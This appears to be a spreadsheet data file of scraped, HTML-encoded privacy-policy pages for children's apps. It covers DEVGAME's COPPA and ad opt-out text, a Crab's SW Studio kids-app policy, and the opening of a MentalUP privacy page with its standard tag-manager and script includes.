    <t>You may at any time opt out from receiving these types of communications by turning them off at the device level through your settings.&lt;/p&gt;
			&lt;h3&gt;Behavioral advertising&lt;/h3&gt;
			&lt;p&gt;Users in the United States may opt out of many third-party ad networks. For example, you may go to the Digital Advertising Alliance ("DAA") Consumer Choice Page for information about opting out of interest-based advertising and your choices regarding having information used by DAA companies. You may also go to the Network Advertising Initiative ("NAI") Consumer Opt-Out Page information about opting out of interest-based advertising and your choices regarding having information used by NAI members.</t>
  </si>
  <si>
    <t>Additional information is available on the DAA's website at www.aboutads.info or the NAI's website at www.networkadvertising.org.&lt;/p&gt;
			&lt;p&gt;Users in the European Union may go the European Interactive Digital Advertising Alliance ("EDAA") Your Online Choices website and select their country to learn more about interest-based advertising and how to opt out in their own country. For example, users in France may go to the Controler ses cookieswebsite to opt out of certain third-party ad networks' interest-based advertising and find additional information at www.youronlinechoices.com/fr.&lt;/p&gt;
			&lt;p&gt;Opting out from one or more companies listed on the DAA Consumer Choice Page, the NAI Consumer Opt-Out Page, or through the various EDAA websites will opt you out from those companies' delivery of interest-based content or ads to you, but it does not mean you will no longer receive any advertising through our Site or App or on other websites.</t>
  </si>
  <si>
    <t>You may continue to receive advertisements, for example, based on the particular website that you are viewing (i.e., contextually based ads). If your browser is configured to reject cookies when you opt out on the DAA, NAI, and/or EDAA websites, your opt out may not be effective. Please note that if you use multiple devices you will have to opt out on each individual device.&lt;/p&gt;
		&lt;/div&gt;
		&lt;div&gt;
			&lt;h2&gt;Links to other websites or applications&lt;/h2&gt;
			&lt;p&gt;Links from the DEVGAME Service to third party websites or applications are provided for your convenience.</t>
  </si>
  <si>
    <t>In addition, content in the Service may be hosted by other websites or applications. Any personal information you provide on the linked pages or applications is provided directly to that third party and is subject to that third party's privacy policy, not ours. These other websites and applications maintain their own policies regarding cookies and the collection and use of personal information.</t>
  </si>
  <si>
    <t>It is up to you to review those policies yourself.&lt;/p&gt;
		&lt;/div&gt;
		&lt;div&gt;
			&lt;h2&gt;Policy regarding children under the age of 13&lt;/h2&gt;
			&lt;p&gt; The DEVGAME is committed to protecting the privacy of children who use our sites and applications. This Children's Online Privacy Policy explains our information collection, disclosure, and parental consent practices with respect to information provided by children under the age of 13 ("child" or "children"), and uses terms that are defined in our general PRIVACY AND COOKIE POLICY.</t>
  </si>
  <si>
    <t>This policy is in accordance with the U.S. Children's Online Privacy Protection Act ("COPPA"), and outlines our practices in the United States and Latin America regarding children's personal information. For more information about COPPA and general tips about protecting children's online privacy, please visit OnGuard Online. Most of DEVGAME's Services are for kids audience and are directed to children under the age of 13.</t>
  </si>
  <si>
    <t>Through these Services, DEVGAME does not knowingly collect or solicit personal information from anyone under the age of 13 or knowingly allow such persons to access those Services.&lt;/p&gt;
			&lt;p&gt;Through other Services, however, DEVGAME may be more likely to collect some personal information about children under 13. For such Services, DEVGAME will request users' ages and, if a user indicates that s/he is under 13, DEVGAME will only collect personal information, such as persistent identifiers (e.g., IP address and device information), necessary for internal operations of the Service. DEVGAME will only use such information to support internal operations of the Service and not for other purposes.&lt;/p&gt;
			&lt;p&gt;If you are under 13, please do not attempt to register an account with any of the Services or send any information about yourself to us, including your name, address, telephone number, or email address.</t>
  </si>
  <si>
    <t>In the event that we learn that we have collected personal information other than persistent identifiers used to support internal operations of the Services, from a child under the age of 13, we will delete that information as quickly as possible. We recommend that minors over the age of 13 ask their parents or guardians for permission before sending any information about themselves to anyone over the Internet.&lt;/p&gt;
			&lt;h2&gt;1. THE INFORMATION WE COLLECT FROM CHILDREN, HOW WE USE IT, AND HOW AND WHEN WE COMMUNICATE WITH PARENTS&lt;/h2&gt;
			&lt;p&gt;DEVGAME offers to its users a range of sites and applications, some of which are primarily targeted at children, and others that are intended for users of all ages and their families.</t>
  </si>
  <si>
    <t>Our sites and applications offer a variety of activities, including activities that may collect information from children. Below we summarize potential instances of collection and outline how and when we will provide parental notice and/or seek parental consent. In any instance that we collect personal information from a child, we will retain that information only so long as reasonably necessary to fulfill the activity request or allow the child to continue to participate in the activity, and ensure the security of our users and our services, or as required by law.</t>
  </si>
  <si>
    <t>In the event we discover we have collected information from a child in a manner inconsistent with COPPA's requirements, we will either delete the information or immediately seek the parent's consent for that collection.&lt;/p&gt;
		&lt;/div&gt;
		&lt;div&gt;
			&lt;h3&gt;Registration&lt;/h3&gt;
			&lt;p&gt;Children can, in many cases, register with our sites and applications to view content, play games, participate in contests, and engage in special features, among other things. During the registration process, we may ask the child to provide certain information for notification and security purposes, including a parent or guardian's email address, the child's first name and gender, the child's member or account username, and password. We also may ask for birth dates from children to validate their ages.</t>
  </si>
  <si>
    <t>We strongly advise children never to provide any personal information in their usernames. Please note that children can choose whether to share their information with us, but certain features cannot function without it. As a result, children may not be able to access certain features if required information has not been provided.</t>
  </si>
  <si>
    <t>We will not require a child to provide more information than is reasonably necessary in order to participate in an online activity.&lt;/p&gt;
			&lt;p&gt;About the collection of parent email address: Consistent with the requirements of COPPA, on any child-targeted site or application, or in any instance where we ask for age and determine the user is age 12 or under, we will ask for a parent or guardian email address before we collect</t>
  </si>
  <si>
    <t>class="c7 lst-kix_list_2-1 start" start="1"&gt;&lt;li class="c3"&gt;&lt;span class="c0"&gt;This Privacy Policy is drafted with adherence to the applicable privacy protection laws, including following legislation:&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;ol class="c7 lst-kix_list_2-2 start" start="1"&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;California Consumer Privacy Act (&amp;ldquo;CCPA&amp;rdquo;):&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p class="c28 c17 c22"&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=http://leginfo.legislature.ca.gov/faces/codes_displayText.xhtml?lawCode%3DCIV%26division%3D3.%26title%3D1.81.5.%26part%3D4.%26chapter%3D%26article%3D&amp;amp;sa=D&amp;amp;ust=1607602738195000&amp;amp;usg=AOvVaw1GX84Nj_uTAVhP_iQVrCQl"&gt;http://leginfo.legislature.ca.gov/faces/codes_displayText.xhtml?lawCode=CIV&amp;amp;division=3.&amp;amp;title=1.81.5.&amp;amp;part=4.&amp;amp;chapter=&amp;amp;article=&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;ol class="c7 lst-kix_list_2-2" start="2"&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;Children&amp;#39;s Online Privacy Protection Rule (&amp;quot;COPPA&amp;quot;)&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p class="c17 c22 c28"&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://uscode.house.gov/view.xhtml?path%3D/prelim@title15/chapter91%26edition%3Dprelim&amp;amp;sa=D&amp;amp;ust=1607602738195000&amp;amp;usg=AOvVaw1ibRjxFnA98UgMN4qnvOD0"&gt;https://uscode.house.gov/view.xhtml?path=/&lt;span class="__cf_email__" data-cfemail="f5858790999c98b5819c819990c4c0"&gt;[email&amp;#160;protected]&lt;/span&gt;/chapter91&amp;amp;edition=prelim&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;ol class="c7 lst-kix_list_2-2" start="3"&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;Regulation (EU) 2016/679 of the European Parliament and of the Council of 27 April 2016 on the protection of natural persons with regard to the processing of personal data and on the free movement of such data, and repealing Directive 95/46/EC (General Data Protection Regulation or &amp;ldquo;GDPR&amp;rdquo;)&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p class="c8 c17 c22"&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://eur-lex.europa.eu/eli/reg/2016/679/oj&amp;amp;sa=D&amp;amp;ust=1607602738196000&amp;amp;usg=AOvVaw0TkrFZDgyzmJSErWWHEgXD"&gt;https://eur-lex.europa.eu/eli/reg/2016/679/oj&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="c8 c12"&gt;&lt;span</t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;!doctype html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
    &lt;meta charset="utf-8"&gt;
    &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"&gt;
    &lt;meta name="p:domain_verify" content="135497ad6f8356643fec1efacd283a48"/&gt;
    &lt;link rel="shortcut icon" type="image/png" href="https://www.crabs.hu/images/icon/128x128.png"/&gt;
    &lt;link rel="apple-touch-icon" href="https://www.crabs.hu/images/icon/60x60.png"&gt;
    &lt;link rel="apple-touch-icon" sizes="76x76" href="https://www.crabs.hu/images/icon/76x76.png"&gt;
    &lt;link rel="apple-touch-icon" sizes="120x120" href="https://www.crabs.hu/images/icon/120x120.png"&gt;
    &lt;link rel="apple-touch-icon" sizes="152x152" href="https://www.crabs.hu/images/icon/152x152.png"&gt;
    &lt;title&gt;Weboldal Készítés - Crab's SW Studio&lt;/title&gt;
    &lt;meta name="description" content="Weboldalak, webshopok készítése saját fejlesztésű CMS rendszerrel, egyedi, személyre szabott webdesignnal. "&gt;
    &lt;meta property="og:title" content="Weboldal Készítés - Crab's SW Studio"&gt;
    &lt;meta property="og:type" content="website"&gt;
    &lt;meta property="og:description" content="Weboldalak, webshopok készítése saját fejlesztésű CMS rendszerrel, egyedi, személyre szabott webdesignnal. "&gt;
    &lt;meta property="og:image" content="https://www.crabs.hu/images/logo.png"&gt;
    &lt;meta property="og:site_name" content="Crab's SW Studio"&gt;
    &lt;meta property="og:url" content="https://www.crabs.hu/"&gt;
    &lt;link rel="schema.dcterms" href="http://purl.org/dc/terms/"&gt;
    &lt;meta name="DC.description" content="Weboldalak, webshopok készítése saját fejlesztésű CMS rendszerrel, egyedi, személyre szabott webdesignnal.</t>
  </si>
  <si>
    <t>"&gt;
    &lt;meta name="DC.format" content="text/html"&gt;
    &lt;meta name="DC.identifier" content="https://www.crabs.hu/"&gt;
    &lt;meta name="DC.publisher" content="Crab's SW Studio"&gt;
    &lt;meta name="DC.title" content="Weboldal Készítés - Crab's SW Studio"&gt;
    &lt;meta name="DC.type" content="Text"&gt;
    &lt;link rel="stylesheet" href="https://www.crabs.hu/vendor/cssreset/css/cssreset.css"&gt;
    &lt;link rel="stylesheet" href="https://www.crabs.hu/vendor/slick/css/slick-1.8.0.min.css"&gt;
    &lt;link rel="stylesheet" href="https://www.crabs.hu/css/icons.min.css"&gt;
    &lt;link rel="stylesheet" href="https://www.crabs.hu/css/initial.min.css"&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;header class="compact"&gt;
    &lt;div class="container"&gt;
        &lt;div class="social-media"&gt;
            &lt;a class="email" href="mailto:hello@crabs.hu" title="Lépj velünk kapcsolatba!"&gt;
                &lt;span class="icon icon-mail"&gt;&lt;/span&gt;
            &lt;/a&gt;
            &lt;a class="facebook" href="https://www.facebook.com/pages/Crabs-SW-Studio/588421824549056" target="_blank" title="Lájkolj minket a Facebookon!"&gt;
                &lt;span class="icon icon-facebook"&gt;&lt;/span&gt;
            &lt;/a&gt;
            &lt;a class="instagram" href="https://www.instagram.com/crabsswstudio/" target="_blank" title="Kövess minket Instagramon!"&gt;
                &lt;span class="icon icon-instagram"&gt;&lt;/span&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;nav class="main-menu"&gt;
            &lt;a href="https://www.crabs.hu/#weboldal-keszites"&gt;Weboldal készítés&lt;/a&gt;
            &lt;a href="https://www.crabs.hu/webaruhaz-keszites"&gt;Webáruház készítés&lt;/a&gt;
            &lt;a href="https://www.crabs.hu/#munkaink"&gt;Munkáink&lt;/a&gt;
            &lt;a href="https://www.crabs.hu/#rolunk"&gt;Rólunk&lt;/a&gt;
            &lt;a href="https://www.crabs.hu/#kapcsolat"&gt;Kapcsolat&lt;/a&gt;
        &lt;/nav&gt;
        &lt;a class="logo" href="https://www.crabs.hu/"&gt;
            &lt;img class="crab" src="https://www.crabs.hu/images/logo.svg" alt="Logo"&gt;
            &lt;img class="text" src="https://www.crabs.hu/images/logo-txt.svg" alt="Crab's SW Studio"&gt;
            &lt;img class="text-compact" src="https://www.crabs.hu/images/logo-txt-compact.svg" alt="Crab's SW Studio"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;button class="mobile-menu-button"&gt;
        &lt;span class="icon icon-menu"&gt;&lt;/span&gt;
    &lt;/button&gt;
&lt;/header&gt;
&lt;div class="mobile-menu-overlay"&gt;&lt;/div&gt;
&lt;div class="mobile-menu"&gt;
    &lt;nav&gt;
        &lt;a href="https://www.crabs.hu/#weboldal-keszites"&gt;Weboldal készítés&lt;/a&gt;
        &lt;a href="https://www.crabs.hu/webaruhaz-keszites"&gt;Webáruház készítés&lt;/a&gt;
        &lt;a href="https://www.crabs.hu/#munkaink"&gt;Munkáink&lt;/a&gt;
        &lt;a href="https://www.crabs.hu/#rolunk"&gt;Rólunk&lt;/a&gt;
        &lt;a href="https://www.crabs.hu/#kapcsolat"&gt;Kapcsolat&lt;/a&gt;
    &lt;/nav&gt;
&lt;/div&gt;
&lt;section class="text header-offset mobile-menu-offset"&gt;
    &lt;div class="container"&gt;
        &lt;h1&gt;Privacy Policy&lt;/h1&gt;
        &lt;p&gt;We respect your preferences concerning the treatment of Information that we may collect. This Privacy Policy explains what kind of information we collect, use, share and the security of your information in relation to our mobile applications ("Applications" or "Apps") and mobile services ("Services").</t>
  </si>
  <si>
    <t>Please take a moment to familiarize yourself with our privacy practices.&lt;/p&gt;
        &lt;p&gt;BY INSTALLING THE APPS ON YOUR MOBILE DEVICE, ENTERING INTO, CONNECTING TO, ACCESSING AND/OR USING THE APPS, YOU AGREE TO THE TERMS AND CONDITIONS SET FORTH IN THIS PRIVACY POLICY, INCLUDING TO THE POSSIBLE COLLECTION AND PROCESSING OF YOUR INFORMATION AND YOU ARE CONSENTING TO THE USE OF COOKIES AND OTHER TRACKING TECHNOLOGIES ON YOUR DEVICE. PLEASE NOTE: IF YOU OR, AS APPLICABLE, YOUR LEGAL GUARDIAN, DISAGREE TO ANY TERM PROVIDED HEREIN, YOU MAY NOT INSTALL, ACCESS AND/OR USE THE APPS AND YOU ARE REQUESTED TO PROMPTLY ERASE THEM, AND ANY PART THEREOF, FROM YOUR MOBILE DEVICE.&lt;/p&gt;
        &lt;h2 style="margin: 30px 0; font-size: 32px; text-align: left;"&gt;What information we collect&lt;/h2&gt;
        &lt;p&gt;Our primary purpose in collecting information is to provide you with a safe, efficient and customized experience and to provide you with Services and features that better meet your needs or requests.&lt;/p&gt;
        &lt;h3&gt;Personal Information&lt;/h3&gt;
        &lt;p&gt; We do &lt;strong&gt;NOT&lt;/strong&gt; collect any Personal Information about you.</t>
  </si>
  <si>
    <t>"Personal Information" means personally identifiable information, such as your name, email address, physical address, calendar entries, contact entries, files, photos, device ID, IP address, etc.&lt;/p&gt;
        &lt;h3&gt;Non-Personal Information&lt;/h3&gt;
        &lt;p&gt; We may collect non-personal information about your use of our Apps and aggregated information regarding the usages of the Apps. "Non-Personal Information" means information that is of an anonymous nature, such as information about the way you use the Applications.&lt;/p&gt;
        &lt;h2 style="margin: 30px 0; font-size: 32px; text-align: left;"&gt;How we use your information we collect&lt;/h2&gt;
        &lt;h3&gt;Personal Information&lt;/h3&gt;
        &lt;p</t>
  </si>
  <si>
    <t>&gt; We do &lt;strong&gt;NOT&lt;/strong&gt; collect and use Personal Information in any way.&lt;/p&gt;
        &lt;h3&gt;Non-Personal Information&lt;/h3&gt;
        &lt;p&gt; We may collect Non-personal information (such as: non personally identifiable app usage data) in order to track unidentifiable usage statistics and use these analytics to improve quality of our apps and games.</t>
  </si>
  <si>
    <t>We do not share, sell or rent any information personal or non-personal to any third parties.&lt;/p&gt;
        &lt;p&gt;Generally non-personal information is used internally to monitor and improve the Services, to perform analyses of the behavior of our users, to measure user demographics and interests. We do not combine Non-Personal Information with Personal Information.&lt;/p&gt;
        &lt;h2 style="margin: 30px 0; font-size: 32px; text-align: left;"&gt;How we share the information we collect&lt;/h2&gt;
        &lt;h3&gt;Personal Information&lt;/h3&gt;
        &lt;p&gt; We do &lt;strong&gt;NOT&lt;/strong&gt; collect and share Personal Information in any way.&lt;/p&gt;
        &lt;h3&gt;Non-Personal Information&lt;/h3&gt;
        &lt;p&gt;</t>
  </si>
  <si>
    <t>We do &lt;strong&gt;NOT&lt;/strong&gt; share Non-Personal Information with any third parties.&lt;/p&gt;
        &lt;h2 style="margin: 30px 0; font-size: 32px; text-align: left;"&gt;Links to third-party websites and services&lt;/h2&gt;
        &lt;p&gt;</t>
  </si>
  <si>
    <t>The Apps may contain links to other websites and online services, including third-party advertisements. If you choose to click through to one of these other websites or online services, please note that any information you may provide will be subject to the privacy policy and other terms and conditions of that websites or service, and not to this Privacy Policy. We do not control third-party websites or services, and the fact that a link to such a website or service appears in the Apps does not mean that we endorse them or have approved their policies or practices relating to user information.</t>
  </si>
  <si>
    <t>Before providing any information to any third-party website or service, we encourage you to review the privacy policy and other terms and conditions of that website or service. You agree that we will have no liability for any matters relating to a third-party website or service that you provide information to, including their collection and handling of that information.&lt;/p&gt;
        &lt;h2 style="margin: 30px 0; font-size: 32px; text-align: left;"&gt;Changes to our Privacy Policy&lt;/h2&gt;
        &lt;p&gt; This Privacy Policy may be updated from time to time for any reason.</t>
  </si>
  <si>
    <t>We will notify you of any changes to our Privacy Policy by posting the new Privacy Policy at: &lt;a href="https://www.crabs.hu/mobile-apps/kids-privacy-policy"&gt;www.crabs.hu/mobile-apps/kids-privacy-policy&lt;/a&gt;&lt;/p&gt;
        &lt;p&gt;Your continued use of the Apps and Services following the posting of changes will mean you accept those changes.&lt;/p&gt;
        &lt;h2 style="margin: 30px 0; font-size: 32px; text-align: left;"&gt;Contact us&lt;/h2&gt;
        &lt;p&gt;If you have any questions regarding privacy while using the Apps, or have questions about our practices, please contact us via email at &lt;a href="mailto:info@crabs.hu"&gt;info@crabs.hu&lt;/a&gt;&lt;/p&gt;
    &lt;/div&gt;
&lt;/section&gt;
&lt;section class="footer-placeholder"&gt;&lt;/section&gt;
&lt;footer&gt;
    &lt;div class="container"&gt;
        &lt;div class="col-left"&gt;
            &lt;a class="logo" href="https://www.crabs.hu/"&gt;&lt;/a&gt;
            &lt;div class="info"&gt;
                &lt;ul&gt;
                    &lt;li&gt;&lt;strong&gt; Krebsz Ádám E. V.&lt;/strong&gt;&lt;/li&gt;
                    &lt;li&gt;Adószám: 66316079-1-33&lt;/li&gt;
                    &lt;li&gt;Nyilvántartási szám: 33776711&lt;/li&gt;
                    &lt;li&gt;K&amp;amp;H: 10404072-50526689-65851002&lt;/li&gt;
                &lt;/ul&gt;
                 &lt;ul&gt;
                    &lt;li&gt;&lt;strong&gt;</t>
  </si>
  <si>
    <t>Krebsz Attila E. V.&lt;/strong&gt;&lt;/li&gt;
                    &lt;li&gt;Adószám: 68468684-1-33&lt;/li&gt;
                    &lt;li&gt;Nyilvántartási szám: 51789950&lt;/li&gt;
                    &lt;li&gt;OTP: 11773425-00853152-00000000&lt;/li&gt;
                &lt;/ul&gt;
            &lt;/div&gt;
            &lt;!--
            &lt;div class="privacy"&gt;
                &lt;a href="https://www.crabs.hu/adatvedelem"&gt;Adatvédelem&lt;/a&gt; NAIH-83063/2015
            &lt;/div&gt;
            --&gt;
            &lt;div class="copy"&gt;Copyright © 2019 &lt; strong&gt;Crab's SW Studio&lt;/strong&gt;, All rights reserved&lt;/div&gt;
        &lt;/div&gt;
        &lt;div class="col-right"&gt;
            &lt;div class="col"&gt;
                &lt;a href="https://www.crabs.hu/" data-target="section.services"&gt;Weboldal készítés&lt;/a&gt;
                &lt;a href="https://www.crabs.hu/webaruhaz-keszites"&gt;Webáruház készítés&lt;/a&gt;
            &lt;/div&gt;
            &lt;div class="col"&gt;
                &lt;a href="https://www.crabs.hu/#munkaink" data-target="section.works"&gt;Munkáink&lt;/a&gt;
            &lt;/div&gt;
            &lt;div class="col"&gt;
                &lt;a href="https://www.crabs.hu/#rolunk" data-target="section.aboutus"&gt;Rólunk&lt;/a&gt;
            &lt;/div&gt;
            &lt;div class="col"&gt;
                &lt;a href="https://www.crabs.hu/#kapcsolat" data-target="section.contact"&gt;Kapcsolat&lt;/a&gt;
                &lt;a href="mailto:hello@crabs.hu"&gt;hello@crabs.hu&lt;/a&gt;
                &lt;a href="https://www.facebook.com/CrabsSolutions" target="_blank"&gt;Facebook&lt;/a&gt;
                &lt;a href="https://www.instagram.com/crabssolutions" target="_blank"&gt;Instagram&lt;/a&gt;
            &lt;/div&gt;
        &lt;/div&gt;
    &lt;/div&gt;
&lt;/footer&gt;
&lt;link rel="stylesheet" href="https://www.crabs.hu/vendor/cookieconsent/css/cookieconsent-3.0.3.min.css"&gt;
&lt;link rel="stylesheet" href="https://www.crabs.hu/fonts/font-face.css"&gt;
&lt;link rel="stylesheet" href="https://www.crabs.hu/css/style.min.css"&gt;
&lt;script src="https://www.crabs.hu/vendor/jquery/js/jquery-3.3.1.min.js"&gt;&lt;/script&gt;
&lt;script src="https://www.crabs.hu/vendor/slick/js/slick-1.8.0.min.js"&gt;&lt;/script&gt;
&lt;script src="https://www.crabs.hu/vendor/cookieconsent/js/cookieconsent-3.0.3.min.js"&gt;&lt;/script&gt;
&lt;script src="https://www.crabs.hu/vendor/crabs/js/crabsapp-1.2.9.min.js"&gt;&lt;/script&gt;
&lt;script src="https://www.crabs.hu/js/header.min.js"&gt;&lt;/script&gt;
&lt;script src="https://www.crabs.hu/js/scroll-effects.min.js"&gt;&lt;/script&gt;
&lt;script src="https://www.crabs.hu/js/cookie.min.js"&gt;&lt;/script&gt;
&lt;script&gt;
    var app = new crabs.</t>
  </si>
  <si>
    <t xml:space="preserve">App({
        debug: false,
        modules: {
            navigation: {
                module: 'Navigation',
                innerAnchor: {
                    scrollDuration: 500,
                    offset: 0
                }
            },
            header: 'Header',
            scrollEffects: 'ScrollEffects',
                    }
    });
&lt;/script&gt;
 &lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>_x005F_x000D_
_x005F_x000D_
&lt;!DOCTYPE html&gt;_x005F_x000D_
&lt;html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"&gt;_x005F_x000D_
&lt;head id="master_Head"&gt;_x005F_x000D_
    &lt;!-- Google Tag Manager --&gt;_x005F_x000D_
    &lt;script&gt;(function (w, d, s, l, i) {_x005F_x000D_
            w[l] = w[l] ||</t>
  </si>
  <si>
    <t>[]; w[l].push({_x005F_x000D_
                'gtm.start':_x005F_x000D_
                    new Date().getTime(), event: 'gtm.js'_x005F_x000D_
            }); var f = d.getElementsByTagName(s)[0],_x005F_x000D_
                j = d.createElement(s), dl = l != 'dataLayer' ? '&amp;l=' + l : ''; j.async = true; j.src =_x005F_x000D_
                    'https://www.googletagmanager.com/gtm.js?id=' +</t>
  </si>
  <si>
    <t>i + dl; f.parentNode.insertBefore(j, f);_x005F_x000D_
        })(window, document, 'script', 'dataLayer', 'GTM-PPGKMRT');&lt;/script&gt;_x005F_x000D_
    &lt;!-- End Google Tag Manager --&gt;_x005F_x000D_
    &lt;title&gt;_x005F_x000D_
	Privacy Policy | MentalUP_x005F_x000D_
&lt;/title&gt;&lt;meta name="author" content="MentalUP Brain Games" /&gt;&lt;meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="shortcut icon" href="favicon.ico" type="image/x-icon" /&gt;&lt;link rel="icon" href="favicon.ico" type="image/x-icon" /&gt;&lt;link rel="alternate" href="android-app://com.ayasis.mentalup/" /&gt;&lt;link href="css/styles.min.css" rel="stylesheet" media="screen" /&gt;&lt;link</t>
  </si>
  <si>
    <t>href="css/additional-styles.min.css" rel="stylesheet" media="screen" /&gt;&lt;link href="css/messagebox.min.css" rel="stylesheet" media="screen" /&gt;&lt;link href="css/cookiebot.min.css" rel="stylesheet" media="screen" /&gt;_x005F_x000D_
_x005F_x000D_
    &lt;script src="js/vendor/modernizr.custom.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script src="js/vendor/detectizr.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyA5DLwPPVAz88_k0yO2nmFe7T9k1urQs84" type="text/javascript"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script src="js/vendor/jquery-2.1.4.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script src="scripts/messagebox.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script src="scripts/security.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script src="js/vendor/preloader.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script src="js/vendor/placeholder.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script src="js/vendor/bootstrap.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script src="js/vendor/smoothscroll.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script src="js/vendor/velocity.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script src="js/vendor/magnific-popup.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script src="js/vendor/owl.carousel.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script src="scripts/master.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;style&gt;_x005F_x000D_
        .async-hide {_x005F_x000D_
            opacity: 0 !</t>
  </si>
  <si>
    <t>important;_x005F_x000D_
        }_x005F_x000D_
    &lt;/style&gt;_x005F_x000D_
    &lt;script src="js/vendor/gmap3.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script src="scripts/SocialMediaSharer.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script src="scripts/device-control.min.js"&gt;&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
    &lt;script id="Cookiebot" src="https://consent.cookiebot.com/uc.js" data-cbid="177fbd3f-1794-4185-85d1-818d42b47f7e" data-blockingmode="auto" type="text/javascript"&gt;&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
        _ x000D_
    &lt;meta name="description" content="If you have questions about MentalUP Privacy Policy, please visit this web page to get more detailed information."</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
    &lt;meta name="robots" content="noindex" /&gt;_x005F_x000D_
&lt;/head&gt;_x005F_x000D_
&lt;body class="is-preloader preloading"&gt;_x005F_x000D_
    &lt;!-- Google Tag Manager (noscript) --&gt;_x005F_x000D_
    &lt;noscript&gt;_x005F_x000D_
        &lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-PPGKMRT"_x005F_x000D_
            height="0" width="0" style="display: none; visibility: hidden"&gt;&lt;/iframe&gt;_x005F_x000D_
    &lt;/noscript&gt;_x005F_x000D_
    &lt;!-- End Google Tag Manager (noscript) --&gt;_x005F_x000D_
    &lt;noscript&gt;Your Internet browser does not support scripting.</t>
  </si>
  <si>
    <t>Check your browser settings.&lt;/noscript&gt;_x005F_x000D_
    &lt;div id="preloader" data-spinner="spinner2" data-screenbg="#fff"&gt;&lt;/div&gt;_x005F_x000D_
    &lt;div class="page-wrapper"&gt;_x005F_x000D_
        &lt;header class="navbar navbar-light navbar-sticky navbar-purple top-zero"&gt;_x005F_x000D_
            &lt;div class="container"&gt;_x005F_x000D_
                &lt;a href="https://www.mentalup.co/" class="site-logo"&gt;_x005F_x000D_
                    &lt;img src="https://www.mentalup.co/img/mentalup-logo-2-white.png" class="logo-default" alt="mentalup logo white" /&gt;_x005F_x000D_
                    &lt;img src="https://www.mentalup.co/img/mentalup-logo-2-white.png" class="logo-alt" alt="mentalup logo white" /&gt;_x005F_x000D_
                 &lt;/a&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
        &lt;/header&gt;_x005F_x000D_
        &lt;div id="messageModal" class="messageModal"&gt;_x005F_x000D_
            &lt;div id="message-modal-content" class="message-modal-content"&gt;_x005F_x000D_
                &lt;div id="message-modal-body" class="message-modal-body"&gt;_x005F_x000D_
                    &lt;div id="message-modal-text" class="message-modal-text"&gt;&lt;/div&gt;_x005F_x000D_
                    &lt;div class="message-modal-button-div"&gt;_x005F_x000D_
                        &lt;div id="btn-modal" class="btn-modal"&gt;CLOSE&lt;/div&gt;_x005F_x000D_
                    &lt;/div&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
        _</t>
  </si>
  <si>
    <t>x000D_
    &lt;section class="fw-section header-space1"&gt;_x005F_x000D_
        &lt;div class="container padding-top-2x text-center"&gt;_x005F_x000D_
            &lt;h1 class="h2-style2 text-center padding-bottom"&gt;Privacy Policy&lt;/h1&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
        &lt;div class="container"&gt;_x005F_x000D_
_x005F_x000D_
